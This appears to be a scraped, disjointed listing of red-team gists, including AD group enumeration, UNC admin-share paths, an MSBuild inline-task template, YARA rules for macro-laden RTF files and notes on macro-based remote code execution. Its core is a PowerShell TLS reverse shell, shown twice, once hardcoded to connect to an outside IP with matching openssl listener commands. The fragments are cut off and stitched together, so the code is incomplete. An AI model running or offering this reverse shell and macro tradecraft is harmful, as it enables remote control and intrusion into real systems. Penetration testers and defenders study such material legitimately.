# Fully Qualified DOS Paths (begins with a drive letter, a volume separator, and a component separator)
c:\Windows\System32\notepad.exe
# UNC Paths (begins with two separators w/o a question mark or period following)
\\127.0.0.1\c$\Windows\System32\notepad.exe
\\LOCALHOST\c$\Windows\System32\notepad.exe
\\::1\c$\Windows\System32\notepad.exe
\\0:0:0::1\c$\Windows\System32\notepad.exe
\\127.0.0.1\admin$\System32\notepad.exe
\\DESKTOP-MH8DLT1\admin$\System32\notepad.exe
clr2of8 / groupenumeration.ps1
Created January 8, 2020 14:59 — forked from joswr1ght/groupenumeration.ps1
Create a Collection of Files for Windows Domain Groups with User Members in Each File
Get-AdGroup -Filter * | % { Get-AdGroupMember $_.Name | Select-Object -ExpandProperty SamAccountName | Out-File -FilePath "$($_.Name).txt" -Encoding ASCII }
function openssl-c2 ($ip,$port,$domain="fake.domain") {
$socket = New-Object Net.Sockets.TcpClient($ip, $port)
$stream = $socket.GetStream()
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient($domain, $null, "Tls12", $false)
$writer = new-object System.IO.StreamWriter($sslStream)
$writer.Write('PS ' + (pwd).Path + '> ')
$writer.flush()
[byte[]]$bytes = 0..65535|%{0};
while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<FragmentExample />
<ClassExample />
</Target>
<UsingTask
rule rtf_with_embedded_macro_enabled_office_document
{
meta:
description = "RTF file with multiple embedded macro-enabled documents"
weight = 90
author = "Walmart Information Security"
date = "2019-03-14"
strings:
// Headers of files to look for
rule rtf_with_multiple_embedded_docs
{
meta:
description = "RTF file with multiple embedded macro-enabled documents"
weight = 90
author = "Walmart Information Security"
date = "2019-03-14"
strings:
// Headers of files to look for
clr2of8 / Various-Macro-Based-RCEs.md
Created March 14, 2019 14:59 — forked from mgeeky/Various-Macro-Based-RCEs.md
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the examples below were generated using 192.168.56.101 as the remote address.

List:

  1. Page substitution macro for luring user to click Enable Content
  2. The Unicorn PowerShell based payload
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 9876
$socket = New-Object Net.Sockets.TcpClient('206.189.70.79', 9876)
$stream = $socket.GetStream()
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false)
$writer = new-object System.IO.StreamWriter($sslStream)
$writer.Write('PS ' + (pwd).Path + '> ')
$writer.flush()
[byte[]]$bytes = 0..65535|%{0};
while(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)
{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
clr2of8 / testcc.js
Created November 13, 2018 21:39
testcc
var webSocketDebuggerUrl;
var port = 9666;
var request = new XMLHttpRequest();
request.open("GET", "http://localhost:" + port + "/json");
request.responseType = 'json';
request.send();
request.onload = function() {
webSocketDebuggerUrl = request.response[0].webSocketDebuggerUrl;
console.log(webSocketDebuggerUrl);